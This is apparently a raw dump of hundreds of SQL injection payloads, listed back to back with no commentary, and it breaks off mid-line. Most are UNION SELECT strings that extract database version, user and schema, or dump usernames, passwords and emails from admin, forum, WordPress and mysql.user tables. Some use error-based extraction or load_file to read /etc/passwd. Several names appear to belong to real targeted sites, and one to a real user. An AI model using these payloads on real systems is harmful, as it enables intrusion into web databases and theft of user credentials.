concat(username,0x3a,user_id),1,2,3,4 from big6_users limit 68,1/* -16 UNION SELECT concat(version(),0x3a,user(),0x3a,database()),2,3,4,5/* -16 union select concat_ws(0x3a3a,login,password) from admin limit 0,1 -- -16 union select concat_ws(0x3a3a,user_name,password) from control_user -- -16 union select concat_ws(0x3A3a,username,user_password,user_id,user_email),2,3,4,5 from big6_users limit 0,1/* -16 union select concat_ws(0x3a,id,user_name,user_pass,user_mail,user_icq) from itaf_user limit 0,1/* -16 union select concat_ws(0x3a,version(),database(),user(),@@version_compile_os),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31-- -16 union select concat_ws(char(58),user(),database(),version())/* -16 union select concat_ws(char(58),username,password) from admin -16 uNiOn sElEcT tAbLe_NaMe from information_schema.tables -- 16 union select USER(),2,3,4,5,6,7,8,9 -17012 union select 1,2,3,4,5,6,7,concat(login,0x3a,password,0x3a,email),9 from user limit 1,1 -1703 union select 1,2,3,concat_ws(0x3a,user,password),5,6,7,8 from mysql.user-- 1704' union select 1,concat(user,char(58),password),3,4 from mysql.user -- -1705' union select 1,2,3,4,5,6,user(),version(),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/* -17087' union select 1,version(),3,4,5,6,7,8,9,10,11/* 1708 and 1=0 union select 1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,0,1,2,3,4/* 1709 and 1=0 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- 1709 and 1=0 union select version()-- 170 and 1=(select top 1 Password from UTILIS_users where user_name='jbelardo') -170 union select 1,2,3,4,concat_ws(0x3a3a,version(),database(),user()),6,7,8,9,10,11,12,13 -170 union select 1,2,3,concat_ws(0x3b, user(),database(),version()),5,6,7,8-- -170 union select 1,2,concat(version(),0x3a,user(),0x3a,database())/* -170 union select 1,concat(version(),0x3a,database(),0x3a,user()),3,4,5,6,7,8,9,10,11/* -170 union select 1,group_concat(table_name separator 0x3a),3,4,5 from information_schema.tables where table_schema=0x636d736f627a6f725f61646d696e-- -170 union select 1,load_file(0x2f6574632f706173737764),3,4,concat_ws(0x3a,user(),version(),database()),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x) -- 170 union select concat_ws(version(),database(),user()),2,3-- 1711 and 2=1 union select 1,2,3,4,5,unhex(hex(concat_ws(0x3a,user(),database(),version())))# 17162 union select 1,2,3,user(),version(),database(),7,8,9,10 -- -1717' UNION SELECT 0,1,2,3,4,5,6,7,8,9,concat_Ws(0x2b,user(),version(),database()),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 -- -1717 union select 1,concat_ws(0x3a,login,pass),3,4 from u40007.users limit 1,1-- -171 UNION SELECT 0,1,2,3,4,CONCAT_WS(0x0B,USER(),VERSION(),DATABASE()),6,7,8,9,10,11,12,13,14,15 -171 union select 1,2,3,4,5,6,7,8,9,10,11,12,13/* -171 uNioN sElEct 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 -- 171 UNION SELECT 1,2,3,4,5,6,7,8,concat_ws(0x3,id,user,pass),10,11,12,13,14,15,16,17,18,19,20 from true_admin-- -171 union select 1,2,3,4,concat(user(),version(),database(),@@version_compile_os),6,7,8 -171' union select 1,2,3,version(),5,6/* -171 union select 1,concat_ws(0x3a,adminUserName,adminPassword),3,4 FROM config -- 17209 and 1=0 union select 1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16-- 1721-999.9 union select 1,2,3,concat(version(),0x3a,database(),0x3a,user()),5,6,7,8,9,10,11,12,13,14-- -1722 union select 1,2,3,4,5,6,7,8,9,10,11 from mysql.user -1722 union select 1,2,3,4,concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a),6,7-- 17,23 order by 16 1724 and 1=0 UnIon selECt 1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a,login,password),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from users-- -172 and 1=2 union select 1,concat_ws(0x3a,@@version,database(),user(),@@version_compile_os),3-- -172 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat_ws(0x3a,id,name,password),19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,concat_ws(0x3a,user(),version(),database()),59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86 from adminaccounts/* 172' union select 1,2,3,4,5,6,7,8,9,concat(version(),0x3a,database(),0x3a,user()),11,12/* -172 union select 1,2,3,concat_ws(0x3a,user_login,user_psw),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from risa_globalanti.users limit 1,1-- -172 UnIon selECt 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 -- -172 union select 1,concat_ws(char(58),user,password),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1 from mysql.user/* -172 union select null,current_database()||':'||version(),null,null,null,null-- 1734-999.9 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28(MSSQLInjection) 17349' or (select count(*) from (select 1 union select 2 union select 3)x group by concat(mid(concat_ws(0x0b,version(),user(),database(),@@version_compile_os),1,63), floor(rand(0)*2)))-- -1735 union select 1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os)-- -1735 UNION SELECT 1,2,concat_ws(0x3a ,user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- -1736876386' union select concat_ws(0x3a,version(),database(),user(),@@version_compile_os) -- -17392 UNION SELECT 1,2,AES_DECRYPT(AES_ENCRYPT(concat(version(),0x3a,user(),0x3a,database()),0x71),0x71),4,5,6,7,8,9,10,11,12,13,14,15,16/* 173 and 1=0 union select 1,2,3,4,5,6,7,8,concat(username,char(58),user_password),10,11,12,13,14,15,16,17,18,19,20 from phpbbnew_users-- -173 union select 1,2,3,4,5,6,7,8,9,0,1,2,concat(user(),0x3a,version(),0x3a,database()) -173 UNION SELECT 1,2,3,4,concat(ID_MEMBER,0x3a,memberName,0x3a,passwd,0x3a,ICQ),6,7,8,9,10,11,12,13 from smf_members limit 0,1/* 173' UNION SELECT 1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13 limit 1,1-- -173 union select 1,2,version(),4,5,6,7,8,9 -- -173 UNION SELECT 1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8 -173 union select 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables-- -1740 union select 1,2,version(),4,5,6,user(),database(),9,10,11,12,13/* -1741 union select 1,2,concat_ws(0x3a,user,passwd),4,5,6,7 from users limit 0,1-- -1741 UNION SELECT 1,concat(id,0x3a,username,0x3a,password),3 from admin limit 0,1/* 1742' UNION SELECT 1,2,3,4,5,6,concat_Ws(0x3a,version(),database(),user(),@@version_compile_os),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 LIMIT 1,1-- -17499' UnIon selECt 1,2,3,4,5,concat_ws(0x3a,login,passwd),7,8,9,10,11,12,13,14,15,16,17,18,19 from access_users limit 0,1-- 174 and 1=0 union select 1,2,group_concat(table_name),4,5 from information_Schema.tables where table_schema=0x753431323736-- 174 and 1=(select top 1 table_name from information_schema.tables where table_name not in ('SubscriberContent_XREF','SUBSCRIBERS','SUBSCRIBERS_XREF','vwTravel_Contact','SubscribersBusiness_XREF','surround','SurveyAnswers','AeroUpload','AllArticles_DisplayTime_View','AREAS','AREAS_CHANNELS_XREF','AREASCHANNELSVIEW','Author_Profile','AUTHORS','authors_xref','AutoPrintSubs','AutoResponse','board','CATEGORY','CATEGORY_SUBCATEGORY_XREF','Channel_Article_View','CHANNEL_XREF','CHANNEL1_2_MENULINK','CHANNEL2_XREF','CHANNEL3_XREF','CHANNELS','CHANNELS2','CHANNELS3','COMMENTS','COMPANY','Counters','DailyNewsPopup','delegate_details','delegates','dir_temp','DIRECTORY','DIRECTORY_CATEGORY_XREF','DIRECTORY_old','DIRECTORY_SHAREPRICE_XREF','DIRECTORY_SUBCATEGORY_XREF','directoryxls','discussion_delegates','DNES3_Config','DNES3_Mode3','DNEServer_Config','dtproperties','Ebusiness','EMailArticleUsers','ENERGYEVENTS','EVENT','EVENTS','EXHIBITING','Expo','featuredContent','FeaturedContent2','feedback','FifteenWords','FrontPage_LocationMatrix','FrontPage_Services','Gerry_temp','ICDirectoryXPort','ICExportView','INDUSTRY','JOBS','JOBSBOARD','JOBSCOMPANIES','MarketsExchanges_NewsFeedOut_View','MCONNECT','messages','MforMobileNewsletter_ChannelExtract','news','Newsletter','Newsletter_Clips_Comment_View','Newsletter_ClipsComments','Newsletter_ClipsComments_Channel','Newsletter_ClipsComments_XREF','Newsletter_MeetPress','Newsletter_MeetPress_View','Newsletter_Reports_View','Newsletter_Reports_XREF','Newsletter_Responder','NewsletterArchiveFiles','OnlineMagazines','OPENING','PANEL','PANELSPEAKERS','PASSWORD','PERSON','PRESENTATION','presentations','PRESENTER','PublishedNewsletters_Reports_View','RECRUITMEN','RECRUITMENT','REGISTER','relatedstories','REPORT','REPORT_AREAS_XREF','Report_Content_View','REPORT_DISPLAY','REPORT_POLL_XREF','REPORT_SUBCHANNEL_XREF','REPORT_TRANSLATIONS_XREF','ReportCompanies_XREF','ReportLinkedCompanies','Reports_By_Author_View','Resource_Articles','Results','RESUMES','SendToFriendAddresses','SHAREPRICE','SHARES_DIRECTORY','SHARESTEMP','Sheet1$','Sheet2$','Sheet3$','Sht','Siwebtmp','STATS','STATS_REFERER','Stream','SUBCATEGORY','SUBCHANNEL_XREF','SUBCHANNELS','SurveyQuestion','sysconstraints','syssegments','t_jiaozhu','tbl_IPCapture','tbl_Visitor','tblAerospaceMembers','tblAuto_Contact_Details','tblAuto_Response_Category','tblAuto_Response_Conference','tblAuto_Response_Conferences','tblAuto_Response_Counter','tblAuto_X_REF','tblDirCategories','tblDirCompanies','tblDirCompanyCategoryXref','tblDirCompanyCustomerXref','tblDirCompanyPartnerXref','tblDirWebsite','tblEmail_Wizard','tblMobile_Delegates','tblPharma_Contact_Details','tblPharma_PP_Details','tblPharma_Response_Category','tblPharma_Response_Conferences','tblPharma_Response_Counter','tblPharma_Subscriber','tblPharma_X_REF','tblTransport_Contact_Details','tblTransport_Response_Category','tblTransport_Response_Counter','tblTransport_X_REF','tblTravel_Contact','tblTravel_Contact_Details','tblTravel_Contact_PostEvent','tblTravel_Contact_PostEvent2005backup','tblTravel_Contact2005backup','tblTravel_ContactMessage','tblTravel_ContactMessage2005backup','tblTravel_Country','tblTravel_Event','tblTravel_Response_Category','tblTravel_Response_Conferences','tblTravel_Response_Counter','tblTravel_User','tblTravel_User_Event','tblTravel_X_REF','Telematic','toplevel','toplevel','tpploPOLL_OPTIONS','tpplqPOLL_QUESTIONS','tpplrPOLL_RESULTS','TRANSLATION','TRANSLATIONS','transport_xml_feed_view','transportsubscribers','TRAVEL SEMINAR LIST','travel_delegates','travel_events','travel_events_xref','travel_messages','TravelRHS','tvp1CHANNEL','tvtp5CHANNEL','VENUE','view_AutoDailyPersonalised','VisitorLogins','Visitors','vw_DailyMailerSubscribers','WAP','WebsiteComment','xref_SubscriberVisitor','xx-DIRECTORY1','xx-DIRECTORY-2','xx-DIRECTORY-latest','xx-DIRECTORY-olddb'))-- -174 union select 1,2,3,4,5,group_concat(login,0x3a,pass),7,8,9,10,11,12 from users-- -174 union select 1,2,3,4,concat_Ws(0x3a3a,FK_ID,FC_LOGIN,FC_PWD,FC_NAME),6,7,8,9,10,11 from core_users /* -174 union select 1,2,column_name,4 from information_schema.columns where table_name=0x6d6f735f7573657273/* -174 union select 1,2,concat(user,password),4,5 from mysql.user-- -174 union select 1,concat(user,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 from user/* -174 union select 1,version(),3,4,5,6,7,8,9,10,11,12-- 17510-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),13,14,15,16-- -1755 union select 1,2,concat(version(),char(58),user()),4,5,6,7,8,9,10,11,12,13,14,15/* -1758 union select 1,2,3,4,5,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),7,8,9,0,1 from s13_users -1758 union select 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35-- 175 and 1=2 UnIon selECt 1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14 from admins-- -175 union select 1,2,3,4,concat_ws(0x2f,version(),user(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* -175 UnIon selECt 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15 -- 175 UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15 LIMIT 1,1/* -175 union select 1,concat_ws(0x3a3a,version(),user(),database(),@@version_compile_os),3,4,5,6,7,8,9,0,1,2,3,4,5,6-- 175 union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12 limit 1,1/* 1765'or (1,1)=(select count(0),concat((select concat_ws(0x3a,U_ID,u_password) from WBS_USER limit 1,1),floor(rand(0)*2))from(information_schema.tables) group by 2)-- 1767 and 1=0 UNION SELECT unhex(hex(version()))-- 176969879879879879800 union select concat_ws(0x3a,user(),version(),database()),2,3-- -1769 union select 1,2,3,4,5,6,version(),8,user(),10,11,12,13/* 176' aNd 1=0 UNION SELECT 1,2,version(),4,5 -- -176 union select 1,2,3,4,5,6,7,'/etc/passwd',9,10,11,12,13,14,15,16,17 -- -176 union select 1,2,concat(version(),0x3a,database(),0x3a,user()),4-- -176 union select 1,concat(user_email,0x3a,username,0x3a,user_password),3 from phpbb_users limit 1,1/* 176 union select 1,concat_ws(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13-- -176 union select 1,group_concat(table_name),3,4,5 from information_schema.tables -176 union select 1,version(),3,4,5,6,7,8-- 176 union select 1,version(),user(),4,5-- 176 union select concat(table_name,0x3a,column_name) from INFORMATION_SCHEMA.columns/* -176 union select user,convert(password using latin1) from mysql.user/* -1771 union select 1,2,concat_ws(0x3a,database(),version(),user()),4,5,6,7,8 -- 17720 UNION SELECT 1,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),User()),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 LIMIT 1,1 -177 union all select 1,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),3 -- -177 union select 0,1,2,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),4,5,6,7,8,9,10/* -177' union select 1,2,3,4,5,6,7,8,9 -- -177 union select 1,2,concat(version(),0x3a,user(),0x3a,database()),4,5,6,7,8,9,10/* -177 union select 1,2,unhex(hex(concat_ws(0x3a3a,version(),user(),database(),@@version_compile_os))),4,5,6,7,8,9,10,11,12-- -177 union select 1,concat(user(),char(58),version(),char(58),database()),3,4,5,6,7,8,9,10,11,12/* -177 union select version(),2 -- 1781 and 1=0 union select 1,column_name,3,4,5,6,7,8,9,10 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)/* -17839 UNION SELECT 1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- -1783 union select user(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16-- -1785 union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6-- 17897669898768 union select 1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13,14,15-- 17898695076 union select 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6-- 178 or 1=@@version-- -178 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat_ws(0x3a,version(),user(),database()),19/* -178 union select 1,2,3,4,concat(username,char(58),password),6,7,8,9 from HMSUAuth-- -178 union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- -178 union select concat_ws(0x3a,user_login,user_passwd) from arc_users/* -178 union select version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- 179182 and 1=2 union all select 1,2,3,4,concat(username,char(58),password),6,7,8,9,10,11,12,13,14 from users-- -1794 union select 1,2,3,concat_ws(0x3a3a3a,email,password),5,6,7,8,9,10,11,12,13,14 from users -- -1794 /*!union*/ /*!select*/ concat_ws(0x3a,0x73616e656b736f736f,user(),database(),version())-- 1796 or 1 group by concat((select concat_ws(0x3a,username,password) from cms_users limit 2,1),floor(rand(0)*2))having min(0) or 1-- 1796 union select concat_ws(0x3a,version(),database(),user()) 1798716988 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,concat_ws(0x3a,version(),user(),database())-- 17987553888092 UNION SELECT 1,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,Version(),0x3a,Database(),0x3a,User(),0x3a),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31-- 179879865398072 union select concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- 17-999.9 union select 1,concat_ws(0x3a,user(),database(),version()),3,4,5-- 1799 union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9 limit 1,1/* -179 or(1,1)=(select count(0),concat((select concat_ws(char(58),user(),version(),database(),@@version_compile_os) from mysql.user limit 0,1),floor(rand(0)*2))from(information_schema.tables)group by 2)-- -179 union select 1,0x4d617873746572,3,4/* -179 union select 1,2,3,4,versioN(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31-- 179 union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15/* -179 union select concat_ws(0x3a,0x3a3a,email_user,password_user,gecos_user) from user_table limit 1,1# 179/**/UNION/**/SELECT/**/password,userid from user/* 17 and 1=0 union select 1,2,version(),4-- 17 and 1=0 union Select concat_ws(0x3a,username,user_password),2,3 from akphpbb_users limit 1,1 -- 17 and 1=2 union select 1,2,3,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),database(),user()),0x71),0x71),5,6-- -17 and 1=2 union select 1,2,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),4,5,6,7 -- 17 and ascii(substring(y()),1,1))=x 17 or 1=(SELECT TOP 1 Name from User where ID=3)-- 17 union select 0,1,concat(USER(),0x3a,VERSION(),0x3a,DATABASE())/* -17 UNION SELECT 1,,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33-- -17 union select 1,2,3,4,5,6,7,8,9,10,11,12,concat(name,char(58),password) from admin-- -17 union select 1,2,3,4,5,6,7,8,9,10,database(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 -- -17 union select 1,2,3,4,5,6,7,8,9,10,table_name,12,13,14,15,16,17 from INFORMATION_SCHEMA.TABLES limit 21,1/* -17 union select 1,2,3,4,5,6,7,8,9,concat(version(),char(58),user(),char(58),database()),11,12,13,14,15,16,17 -17 union select 1,2,3,4,5,6,7,8,concat(login,char(58),pass),10 from users/* -17 union select 1,2,3,4,5,6,7,concat_ws(0x3a,database(),version(),user()),9,10-- 17 union select 1,2,3,4,5,6,7,concat_ws(0x3a,m_id,name,password) from gd_member/* -17 union select 1,2,3,4,5,6,7,concat_ws(0x3a,username,user_password),9,10 from park_phpbb_users limit 1,1/* -17 union select 1,2,3,4,5,6,7,LOAD_FILE('/tmp/preved.php'),9,10,11,12,13,14,15,16,17 -17 union select 1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),8,9,10 17 union select 1,2,3,4,5,6,version(),8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3 -- -17 UNION SELECT 1,2,3,4,5,concat(shop_stock_ID,0x3a,spec,0x3a,quant,0x3a,name,0x3a,descr,0x3a,price) FROM shop LEFT JOIN shop_stock ON ref_shop=shop_ID WHERE shop_ID=17/* 17 UNION SELECT 1,2,3,4,5,concat_ws(version(),user(),database()),7,8,9,10,11,12,13 -- -17 union select 1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17 -17 union select 1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11 from members limit 0,1-- -17 union select 1,2,3,4,concat_ws(0x3a3a3a,user,password,file_priv),6 from mysql.user limit 0,1 -- -17 union select 1,2,3,4 from information_schema.tables 17 union select 1,2,3,AES_DECRYPT(AES_ENCRYPT(user(),0x71),0x71),5,6,7,8,9,0,1 /* 17 UNION SELECT 1,2,3,CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),5,6 LIMIT 1,1-- -17 union select 1,2,3,concat(login,0x3a,pwd),5,6,7,8,9 from neftebor_users/* 17' union select 1,2,3,concat(user(),0x3a,database(),0x3a,version()),5/* -17 union select 1,2,3,concat_ws(0x3a,user_login,user_pass) from girldays_allneft.wp_users-- -17 union select 1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 -17 union select 1,2,3,concat_ws(char(58),version(),user(),database()),5,6/* -17 union select 1,2,3,group_concat(id,char(58),username,char(58),password) from ok_admins -17 union select 1,2,3,group_concat(table_name),5,6 from information_schema.tables 17 union select 1,2,3,group_concat(table_name) from information_schema.tables -- -17' union select 1,2,3,unhex(hex(concat_ws(0x2a3a2a,version(),database(),user(),@@version_compile_os))),5,6,7,8,9,0,1,2,3-- -17 union select 1,2,3,username,password,6,7,8,9,10,11,12,13,14 from adminrights/* 17 UNION SELECT 1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA,0x7873716C696E6A64656C,TABLE_ROWS) FROM INFORMATION_SCHEMA.TABLES LIMIT 20,1),0x7873716C696E6A656E64),0x71),0x71),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34-- -17' union select 1,2,concat(user(),0x3a,database(),0x3a,version()),4,5,6,7,8,9,10,11/* 17' union select 1,2,concat(user,0x3a,password) from mysql.user/* -17 union select 1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9 -17 union select 1,2,concat(user(),0x3a,version()),4,5,0x2e2e2f2e2e2f6e6577732e6a7067/* 17 union select 1,2,concat(version(),0x3a,database(),0x3a,user()),4,5/* -17 union select 1,2,concat_ws(0x3a3a3a,username,password,email) from users -- 17 union select 1,2,concat_ws(0x3a3a,version(),user(),database()),4,5,6,7,8,9,10,11 17 union select 1,2,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),4,5,6,7 -17 union select 1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8,9,10,11-- 17' UNION SELECT 1,2,concat_ws(0x3a,version(),user(),database())/* -17 union select 1,2,file_priv,4,concat_ws(0x3a3a3a,user,password),6 from mysql.user limit 0,1 -- -17 union select 1,2,group_concat(id,0x3a,name,0x3a,email,0x3a,tel,0x3a,date,0x0b),4 from clients-- -17 union select 1,2,group_concat(version(),0x3a,user()) -- -17' union select 1,2,null,null,null,concat_ws(char(58),username,password,email),null,null,null,null,null,null,13 from users/* -17 union select 1,2,table_name from information_schema.tables/* -17 union select 1,2,unhex(hex(concat_ws(0x3a,username,user_password))),4,5,6,7,8 from atn.forum_users limit 1,1-- -17 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 -- -17 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- 17 union select 1,AES_DECRYPT(AES_ENCRYPT(concat(database(),0x3a,version(),0x3a,user()),0x73),0x73),3,4,5/* 17 UNION SELECT 1,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),User()),0x71),0x71),3,4,5,6,7/* -17 union select 1,concat(email,0x3a,password),3,4,5,6,7 from admin_users-- -17 union select 1,concat_ws(0x3a3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12 17 union select 1,concat_ws(0x3a3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37-- -17'/**/UNION/**/SELECT/**/1,concat_ws(0x3a,user(),version(),database()) -- -17 union select 1,concat_ws(char(58),version(),user(),database()),3/* -17 union select 1,database(),3-- -17 union select 1,group_concat(user_name,char(58),password),3,4,5 from cms_users -17 union select 1,user(),3,4,5,6,7 -- -17 union select 1,user(),3,4,5,6 from information_schema.tables -- -17 union select 1,user,3,4,5 from users /* -17 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 -17 union select concat(user(),version(),database()),2,3 -- -17 union select concat_ws(0x3a3a3a,username,userpassword),2,3,4,5,6,7,8,9 from users limit 0,1 -- -17' union select concat_ws(0x3a3a,login,password,name,rights) from leninets_users -- -17 union select concat_ws(0x3a,user_email,user_password),2,3 from phpbb_users limit 1,1 -- -17 union select concat_ws(0x3a,user,version(),0x736b794c6162),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7 from mysql.user/* 17 union select concat_ws(0x3a,version(),user(),database()),2,3 -17 union select concat_ws(0x3a,version(),user(),database()),2,3,4,5 17 union select concat_ws(0x3,version(),user(),database()),2 -17 union select version(),2,3,concat(user(),0x3a,database())-- -1801 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from admin/* -1804 union select 1,2,3,4,5,user,7,8,9,10,password,12,13,14 from mysql.user/* -1806 union select 1,2,3,4,user,6,password,8,9,10,11,12,13,14,15,16,17,18,19 from mysql.user/* 18092 and 1=(select top 1 table_name from information_schema.tables) 1809809709840 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42-- 1809809765440 UNION SELECT 1,CONCAT(0x3a,(SELECT CONCAT(username,0x3a,password,0x3a,email) FROM ecdl.ecdl_person LIMIT 0,1),0x3a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68-- 1809809765440 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68-- 180' order by 1 -180 union select 1,2,3,4,5,6,7,group_concat(column_name),9,10,11,12,13,14,15,16 from information_schema.columns where table_name=0x67697665617761795f7573657273 -- -180 union select 1,2,3,4,5,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),7,8 -- 180 UNION SELECT 1,2,3,4,AES_DECRYPT(AES_ENCRYPT(concat(version(),0x3a,user(),0x3a,database(),0x78),0x78),6,7,8,9,10,11,12,13,14,15,16/* -180 union select 1,2,3,4,group_concat(column_name),6,7,8 from information_schema.columns where table_name=0x5f6769735f7573657273-- -18167 and 1=2 union select 1,2,concat_ws(0x3a,@@version,user(),database()),4,5,6,7,8,9 -- 18/170847 and 1=0 UNION SELECT 1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18,19,20 -- 18176875587 union select 1,2,3,4,5,6,7,8,9,concat_ws(0x3a,version(),user(),database()),11,12,13,14,15-- 181-999.9 union select 1,2,3,4,5-- -181 and (select*from(select count(*)from(select 1 union select 2 union select 3)x group by concat(mid((select group_concat(user,char(58,32),pass) from usuar limit 0,1),1,60),floor(rand(0)*2)))n)-- -181 union select 1,2,3,4,5,6,7,8,9 from pagetext1 -181 UnIon selECt 1,2,3,aes_decrypt(aes_encrypt(group_concat(table_name),1),1),5,6,7,8,9,10 from information_schema.tables limit 0,1-- -181 union select 1,2,3,CONVERT(concat_ws(0x3a,version(),user(),database()) using latin1),5,6,7,8,9,10,11,12,13,14/* -181 union select 1,concat_ws(0x3a,Username,Password),3,4,5,6,7,8,9,10,11 from userlogin limit 1,1-- -181 union select 1,version(),3,4,5,6,7/* -181 union select concat_ws(0x3b,version(),user(),database()) -- -181 union select user(),2,3,4,5,6/* 1821 aNd 1=0 UNION SELECT 